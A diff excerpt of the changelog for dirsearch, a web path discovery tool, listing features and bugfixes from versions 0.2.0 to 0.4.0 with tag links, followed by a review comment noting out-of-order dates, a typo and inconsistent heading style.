37
|
+
- Match/filter status codes by ranges
|
38
|
+
- Detect 429 response status code
|
39
|
+
- Support SOCKS proxy
|
40
|
+
- XML, Markdown and CSV report formats
|
41
|
+
- Capital wordlist format
|
42
|
+
- Option to replay proxy with found paths
|
43
|
+
- Option to remove all extensions in the wordlist
|
44
|
+
- Option to exit whenever an error occurs
|
45
|
+
- Option to disable colored output
|
46
|
+
- Debug mode
|
47
|
+
- Multiple bugfixes
|
48
|
+
|
49
|
+
## [0.4.0] - September 27, 2020
|
50
|
+
- Exclude extensions argument added
|
51
|
+
- No dot extensions option
|
52
|
+
- Support HTTP request data
|
53
|
+
- Added minimal response length and maximal response length arguments
|
54
|
+
- Added include status codes and exclude status codes arguments
|
55
|
+
- Added --clean-view option
|
56
|
+
- Added option to print the full URL in the output
|
57
|
+
- Added Prefixes and Suffixes arguments
|
58
|
+
- Multiple bugfixes
|
59
|
+
|
60
|
+
## [0.3.9] - November 26, 2019
|
61
|
+
- Added default extensions argument (-E).
|
62
|
+
- Added suppress empty responses.
|
63
|
+
- Recursion max depth.
|
64
|
+
- Exclude responses with text and regexes.
|
65
|
+
- Multiple fixes.
|
66
|
+
|
67
|
+
## [0.3.8] - July 25, 2017
|
68
|
+
- Delay argument added.
|
69
|
+
- Request by hostname switch added.
|
70
|
+
- Suppress empty switch added.
|
71
|
+
- Added Force Extensions switch.
|
72
|
+
- Multiple bugfixes.
|
73
|
+
|
74
|
+
## [0.3.7] - August 22, 2016
|
75
|
+
- Force extensions switch added
|
76
|
+
|
77
|
+
## [0.3.6] - February 14, 2016
|
78
|
+
- Bugfixes
|
79
|
+
|
80
|
+
## [0.3.5] - January 29, 2016
|
81
|
+
- Improved heuristic
|
82
|
+
- Replaced urllib3 for requests
|
83
|
+
- Error logs
|
84
|
+
- Batch reports
|
85
|
+
- User agent randomization
|
86
|
+
- bugfixes
|
87
|
+
|
88
|
+
## [0.3.0] - February 5, 2015
|
89
|
+
- Fixed issue3
|
90
|
+
- Fixed timeout exception
|
91
|
+
- Ported to Python3
|
92
|
+
- Other bugfixes
|
93
|
+
|
94
|
+
## [0.2.7] - November 21, 2014
|
95
|
+
- Added Url List feature (-l)
|
96
|
+
- Changed output
|
97
|
+
- Minor Fixes
|
98
|
+
|
99
|
+
## [0.2.6] - September 12, 2014
|
100
|
+
- Fixed bug when dictionary size is greater than threads count
|
101
|
+
- Fixed URL encoding bug
|
102
|
+
|
103
|
+
## [0.2.5] - September 2, 2014
|
104
|
+
- Shows Content-Length in output and reports
|
105
|
+
- Added default.conf file (for setting defaults)
|
106
|
+
- Report auto save feature added.
|
107
|
+
|
108
|
+
## [0.2.4] - July 17, 2014
|
109
|
+
- Added Windows support
|
110
|
+
- `--scan-subdirs` argument added
|
111
|
+
- `--exclude-subdirs` added
|
112
|
+
- `--header` argument added
|
113
|
+
- Dirbuster dictionaries added
|
114
|
+
- Fixed some concurrency bugs
|
115
|
+
- MVC refactoring
|
116
|
+
|
117
|
+
## 0.2.3 - July 7, 2014
|
118
|
+
- Fixed some bugs
|
119
|
+
- Minor refactorings
|
120
|
+
- Exclude status switch
|
121
|
+
- Pause/next directory feature
|
122
|
+
- Changed help structure
|
123
|
+
- Expaded default dictionary
|
124
|
+
|
125
|
+
## 0.2.2 - July 2, 2014
|
126
|
+
- Fixed some bugs
|
127
|
+
- Showing percentage of tested paths and added report generation feature
|
128
|
+
|
129
|
+
## 0.2.1 - May 1, 2014
|
130
|
+
- Fixed some bugs and added recursive option
|
131
|
+
|
132
|
+
## 0.2.0 - January 31, 2014
|
133
|
+
- Initial public release
|
134
|
+
|
135
|
+
[Unreleased]: https://github.com/maurosoria/dirsearch/tree/master
|
136
|
+
[0.4.3]: https://github.com/maurosoria/dirsearch/tree/v0.4.3
|
137
|
+
[0.4.2]: https://github.com/maurosoria/dirsearch/tree/v0.4.2
|
138
|
+
[0.4.1]: https://github.com/maurosoria/dirsearch/tree/v0.4.1
|
139
|
+
[0.4.0]: https://github.com/maurosoria/dirsearch/tree/v0.4.0
|
140
|
+
[0.3.9]: https://github.com/maurosoria/dirsearch/tree/v0.3.9
|
141
|
+
[0.3.8]: https://github.com/maurosoria/dirsearch/tree/v0.3.8
|
142
|
+
[0.3.7]: https://github.com/maurosoria/dirsearch/tree/v0.3.7
|
143
|
+
[0.3.6]: https://github.com/maurosoria/dirsearch/tree/v0.3.6
|
144
|
+
[0.3.5]: https://github.com/maurosoria/dirsearch/tree/v0.3.5
|
145
|
+
[0.3.0]: https://github.com/maurosoria/dirsearch/tree/v0.3.0
|
146
|
+
[0.2.7]: https://github.com/maurosoria/dirsearch/tree/v0.2.7
|
147
|
+
[0.2.6]: https://github.com/maurosoria/dirsearch/tree/v0.2.6
|
148
|
+
[0.2.5]: https://github.com/maurosoria/dirsearch/tree/v0.2.5
|
149
|
+
[0.2.4]: https://github.com/maurosoria/dirsearch/tree/v0.2.4
|
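Review bot: the release dates are out of order: 0.4.1 on line 32 is dated August 12, 2020, which is earlier than 0.4.0 on line 49 (September 27, 2020), so one of the two is wrong. Smaller points: line 123 has "Expaded" for "Expanded", the heading style changes from `## [x.y.z]` to unbracketed `## 0.2.3` at line 117 with no link references for 0.2.3 and earlier, and line 5 writes "October 2nd, 2022" where every other entry uses the "September 12, 2021" form.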